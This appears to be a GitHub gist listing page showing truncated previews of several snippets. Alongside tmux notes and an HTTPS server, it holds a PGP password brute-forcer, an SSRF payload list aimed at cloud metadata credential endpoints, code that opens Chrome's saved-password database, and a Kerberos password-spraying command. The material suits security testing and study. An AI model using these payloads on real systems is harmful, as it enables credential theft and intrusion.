start new:
tmux
start new with session name:
tmux new -s myname
marcan2020
craSH
/ gpg_bruteforce.py
Created
May 24, 2011 20:09
Determine password for a PGP private key based on a wordlist.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """ | |
| Determine password for a PGP private key based on a wordlist. | |
| Also performs permutations on passwords in the case of l33tsp3ak, etc. | |
| Requires python-gnupg (easy_install/pip install python-gnupg) | |
| To quiet down some of the exceptions during signing attempts, the following | |
| "patch" is needed within gnupg.py: |
dergachev
/ simple-https-server.py
Created
October 17, 2013 17:07
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/ | |
| # generate server.xml with the following command: | |
| # openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes | |
| # run as follows: | |
| # python simple-https-server.py | |
| # then in your browser, visit: | |
| # https://localhost:4443 | |
| import BaseHTTPServer, SimpleHTTPServer | |
| import ssl |
BuffaloWill
/ cloud_metadata.txt
Last active
July 16, 2024 17:59
Cloud Metadata Dictionary useful for SSRF Testing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## IPv6 Tests | |
| http://[::ffff:169.254.169.254] | |
| http://[0:0:0:0:0:ffff:169.254.169.254] | |
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
LPX55
/ chrome_demonstration.py
Created
March 29, 2019 07:12
Extracting Chrome Passwords with Python | Demonstration for hackernoon.com/@HanYoon
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # os and sqlite3 ships with Python by default. If you get import errors for win32crypt use "pip install pypiwin32" to install the dependency. | |
| import os, sqlite3, win32crypt | |
| # Automatically get the logged in user's default folder | |
| data = os.path.expanduser('~')+"\AppData\Local\Google\Chrome\User Data\Default\Login Data" | |
| # Connect to Login Data database | |
| connection = sqlite3.connect(data) | |
| cursor = connection.cursor() |
TarlogicSecurity
/ kerberos_attacks_cheatsheet.md
Created
May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module: